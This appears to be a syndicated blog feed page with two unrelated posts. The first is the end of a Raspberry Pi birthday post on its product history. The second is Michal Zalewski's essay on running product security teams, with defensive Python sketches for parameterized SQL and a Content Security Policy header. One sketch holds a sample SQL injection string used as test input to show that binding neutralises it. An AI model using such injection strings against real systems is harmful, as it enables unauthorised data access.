While James was working on the Model B+, Broadcom was busy behind the scenes developing a follow-on to the BCM2835 application processor. BCM2836 samples arrived in Cambridge at 18:00 one evening in April 2014 (chips never arrive at 09:00 — it’s always early evening, usually just before a public holiday), and within a few hours Dom had Raspbian, and the usual set of VideoCore multimedia demos, up and running.

We launched Raspberry Pi 2 at the start of 2015, pairing BCM2836 with 1GB of memory. With a quad-core Arm Cortex-A7 clocked at 900MHz, we’d increased performance sixfold, and memory fourfold, in just three years.

Nobody mention the xenon death flash.

And of course, while James was working on Raspberry Pi 2, Broadcom was developing BCM2837, with a quad-core 64-bit Arm Cortex-A53 clocked at 1.2GHz. Raspberry Pi 3 launched barely a year after Raspberry Pi 2, providing a further doubling of performance and, for the first time, wireless LAN and Bluetooth.

All our recent products are just the same board shot from different angles

Zero to hero

Where the PC industry has historically used Moore’s Law to “fill up” a given price point with more performance each year, the original Raspberry Pi used Moore’s Law to deliver early-2000s PC performance at a lower price. But with Raspberry Pi 2 and 3, we’d gone back to filling up our original $35 price point. After the launch of Raspberry Pi 2, we started to wonder whether we could pull the same trick again, taking the original Raspberry Pi platform to a radically lower price point.

The result was Raspberry Pi Zero. Priced at just $5, with a 1GHz BCM2835 and 512MB of RAM, it was cheap enough to bundle on the front of The MagPi, making it the first computer magazine to give away a computer as a cover gift.

Cheap thrills

MagPi issue 40 in all its glory

We followed up with the $10 Raspberry Pi Zero W, launched exactly a year ago. This adds the wireless LAN and Bluetooth functionality from Raspberry Pi 3, using a rather improbable-looking PCB antenna designed by our buddies at Proant in Sweden.

Up to our old tricks again

Other things

Of course, this isn’t all. There has been a veritable blizzard of point releases; RAM changes; Chinese red units; promotional blue units; Brazilian blue-ish units; not to mention two Camera Modules, in two flavours each; a touchscreen; the Sense HAT (now aboard the ISS); three compute modules; and cases for the Raspberry Pi 3 and the Zero (the former just won a Design Effectiveness Award from the DBA). And on top of that, we publish three magazines (The MagPi, Hello World, and HackSpace magazine) and a whole host of Project Books and Essentials Guides.

Chinese Raspberry Pi 1 Model B

RS Components limited-edition blue Raspberry Pi 1 Model B

Brazilian-market Raspberry Pi 3 Model B

Visible-light Camera Module v2

Learning about injection moulding the hard way

250 pages of content each month, every month

Essential reading

Forward the Foundation

Why does all this matter? Because we’re providing everyone, everywhere, with the chance to own a general-purpose programmable computer for the price of a cup of coffee; because we’re giving people access to tools to let them learn new skills, build businesses, and bring their ideas to life; and because when you buy a Raspberry Pi product, every penny of profit goes to support the Raspberry Pi Foundation in its mission to change the face of computing education.

We’ve had an amazing six years, and they’ve been amazing in large part because of the community that’s grown up alongside us. This weekend, more than 150 Raspberry Jams will take place around the world, comprising the Raspberry Jam Big Birthday Weekend.

Raspberry Pi Big Birthday Weekend 2018. GIF with confetti and bopping JAM balloons

If you want to know more about the Raspberry Pi community, go ahead and find your nearest Jam on our interactive map — maybe we’ll see you there.

The post Happy birthday to us! appeared first on Raspberry Pi.

Getting product security engineering right

Post Syndicated from Michal Zalewski original http://lcamtuf.blogspot.com/2018/02/getting-product-security-engineering.html

Product security is an interesting animal: it is a uniquely cross-disciplinary endeavor that spans policy, consulting, process automation, in-depth software engineering, and cutting-edge vulnerability research. And in contrast to many other specializations in our field of expertise – say, incident response or network security – we have virtually no time-tested and coherent frameworks for setting it up within a company of any size.

In my previous post, I shared some thoughts on nurturing technical organizations and cultivating the right kind of leadership within. Today, I figured it would be fitting to follow up with several notes on what I learned about structuring product security work – and about actually making the effort count.

The “comfort zone” trap

For security engineers, knowing your limits is a sought-after quality: there is nothing more dangerous than a security expert who goes off script and starts dispensing authoritative-sounding but bogus advice on a topic they know very little about. But that same quality can be destructive when it prevents us from growing beyond our most familiar role: that of a critic who pokes holes in other people’s designs.

The role of a resident security critic lends itself all too easily to a sense of supremacy: the mistaken belief that our cognitive skills exceed the capabilities of the engineers and product managers who come to us for help – and that the cool bugs we file are the ultimate proof of our special gift. We start taking pride in the mere act of breaking somebody else’s software – and then write scathing but ineffectual critiques addressed to executives, demanding that they either put a stop to a project or sign off on a risk. And hey, in the latter case, they better brace for our triumphant “I told you so” at some later date.

Of course, escalations of this type have their place, but they need to be a very rare sight; when practiced routinely, they are a telltale sign of a dysfunctional team. We might be failing to think up viable alternatives that are in tune with business or engineering needs; we might be very unpersuasive, failing to communicate with other rational people in a language they understand; or it might be that our tolerance for risk is badly out of whack with the rest of the company. Whatever the cause, I’ve seen high-level escalations where the security team spoke of valiant efforts to resist inexplicably awful design decisions or data sharing setups; and where product leads in turn talked about pressing business needs randomly blocked by obstinate security folks. Sometimes, simply having them compare their notes would be enough to arrive at a technical solution – such as sharing a less sensitive subset of the data at hand.

To be effective, any product security program must be rooted in a partnership with the rest of the company, focused on helping them get stuff done while eliminating or reducing security risks. To combat the toxic us-versus-them mentality, I found it helpful to have some team members with software engineering backgrounds, even if it’s the ownership of a small open-source project or so. This can broaden our horizons, helping us see that we all make the same mistakes – and that not every solution that sounds good on paper is usable once we code it up.

Getting off the treadmill

All security programs involve a good chunk of operational work. For product security, this can be a combination of product launch reviews, design consulting requests, incoming bug reports, or compliance-driven assessments of some sort. And curiously, such reactive work also has the property of gradually expanding to consume all the available resources on a team: next year is bound to bring even more review requests, even more regulatory hurdles, and even more incoming bugs to triage and fix.

Being more tractable, such routine tasks are also more readily enshrined in SDLs, SLAs, and all kinds of other official documents that are often mistaken for a mission statement that justifies the existence of our teams. Soon, instead of explaining to a developer why they should fix a particular problem right away, we end up pointing them to page 17 in our severity classification guideline, which defines that “severity 2” vulnerabilities need to be resolved within a month. Meanwhile, another policy may be telling them that they need to run a fuzzer or a web application scanner for a particular number of CPU-hours – no matter whether it makes sense or whether the job is set up right.

To run a product security program that scales sublinearly, stays abreast of future threats, and doesn’t erect bureaucratic speed bumps just for the sake of it, we need to recognize this inherent tendency for operational work to take over – and we need to rein it in. No matter what last year’s policy says, we usually don’t need to be doing security reviews with a particular cadence or to a particular depth; if we need to scale them back 10% to staff a two-quarter project that fixes an important API and squashes an entire class of bugs, it’s a short-term risk we should feel empowered to take.

As noted in my earlier post, I find contingency planning to be a valuable tool in this regard: why not ask ourselves how the team would cope if the workload went up another 30%, but bad financial results precluded any team growth? It’s actually fun to think about such hypotheticals ahead of time – and hey, if the ideas sound good, why not try them out today?

Living for a cause

It can be difficult to understand if our security efforts are structured and prioritized right; when faced with such uncertainty, it is natural to stick to the safe fundamentals – investing most of our resources into the very same things that everybody else in our industry appears to be focusing on today.

I think it’s important to combat this mindset – and if so, we might as well tackle it head on. Rather than focusing on tactical objectives and policy documents, try to write down a concise mission statement explaining why you are a team in the first place, what specific business outcomes you are aiming for, how you prioritize them, and how you want it all to change in a year or two. It should be a fluid narrative that reads right and that everybody on your team can take pride in; my favorite way of starting the conversation is telling folks that we could always have a new VP tomorrow – and that the VP’s first order of business could be asking, “why do you have so many people here and how do I know they are doing the right thing?”. It’s a playful but realistic framing device that motivates people to get it done.

In general, a comprehensive product security program should probably start with the assumption that no matter how many resources we have at our disposal, we will never be able to stay in the loop on everything that’s happening across the company – and even if we did, we’re not going to be able to catch every single bug. It follows that one of our top priorities for the team should be making sure that bugs don’t happen very often; a scalable way of getting there is equipping engineers with intuitive and usable tools that make it easy to perform common tasks without having to worry about security at all. Examples include standardized, managed containers for production jobs; safe-by-default APIs, such as strict contextual autoescaping for XSS or type safety for SQL; security-conscious style guidelines; or plug-and-play libraries that take care of common crypto or ACL enforcement tasks.
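
To make the safe-by-default idea concrete, here’s a generic Python/sqlite3 sketch (ours, not tied to any particular company’s stack) of a query API where user input is bound as data and can never alter the structure of the statement:

    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT)")
    conn.execute("INSERT INTO users (name) VALUES (?)", ("alice",))

    user_input = "alice' OR '1'='1"

    # The placeholder binds user_input as a value; the quoting tricks in it
    # are matched literally instead of being parsed as SQL.
    rows = conn.execute(
        "SELECT name FROM users WHERE name = ?", (user_input,)
    ).fetchall()
    print(rows)  # [] (the injection attempt matches nothing)

With an API like this, the engineer never has to think about escaping; the safe path is also the path of least resistance.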

Of course, not all problems can be addressed on framework level, and not every engineer will always reach for the right tools. Because of this, the next principle that I found to be worth focusing on is containment and mitigation: making sure that bugs are difficult to exploit when they happen, or that the damage is kept in check. The solutions in this space can range from low-level enhancements (say, hardened allocators or seccomp-bpf sandboxes) to client-facing features such as browser origin isolation or Content Security Policy.
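
As one client-facing example, a Content Security Policy can be set in a single place so that scripts injected through an XSS bug have nowhere to run. Here’s a minimal sketch (the Flask framework and the policy string are illustrative choices of ours):

    from flask import Flask

    app = Flask(__name__)

    @app.after_request
    def set_csp(response):
        # Restrict scripts and other resources to our own origin; an inline
        # script injected via an XSS bug will be refused by the browser.
        response.headers["Content-Security-Policy"] = "default-src 'self'"
        return response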

The usual consulting, review, and outreach tasks are an important facet of a product security program, but probably shouldn’t be the sole focus of your team. It’s also best to avoid undue emphasis on vulnerability showmanship: while valuable in some contexts, it creates a hypercompetitive environment that may be hostile to less experienced team members – not to mention, squashing individual bugs offers very limited value if the same issue is likely to be reintroduced into the codebase the next day. I like to think of security reviews as a teaching opportunity instead: it’s a way to raise awareness, form partnerships with engineers, and help them develop lasting habits that reduce the incidence of bugs. Metrics to understand the impact of your work are important, too; if your engagements are seen mostly as yet another layer of red tape, product teams will stop reaching out to you for advice.

The other tenet of a healthy product security effort requires us to recognize that, at scale and given enough time, every defense mechanism is bound to fail – and so, we need ways to prevent bugs from turning into incidents. The efforts in this space may range from developing product-specific signals for the incident response and monitoring teams; to offering meaningful vulnerability reward programs and nourishing a healthy and respectful relationship with the research community; to organizing regular offensive exercises in hopes of spotting bugs before anybody else does.

Oh, one final note: an important feature of a healthy security program is the existence of multiple feedback loops that help you spot problems without the need to micromanage the organization and without being deathly afraid of taking chances. For example, the data coming from bug bounty programs, if analyzed correctly, offers a wonderful way to alert you to systemic problems in your codebase – and later on, to measure the impact of any remediation and hardening work.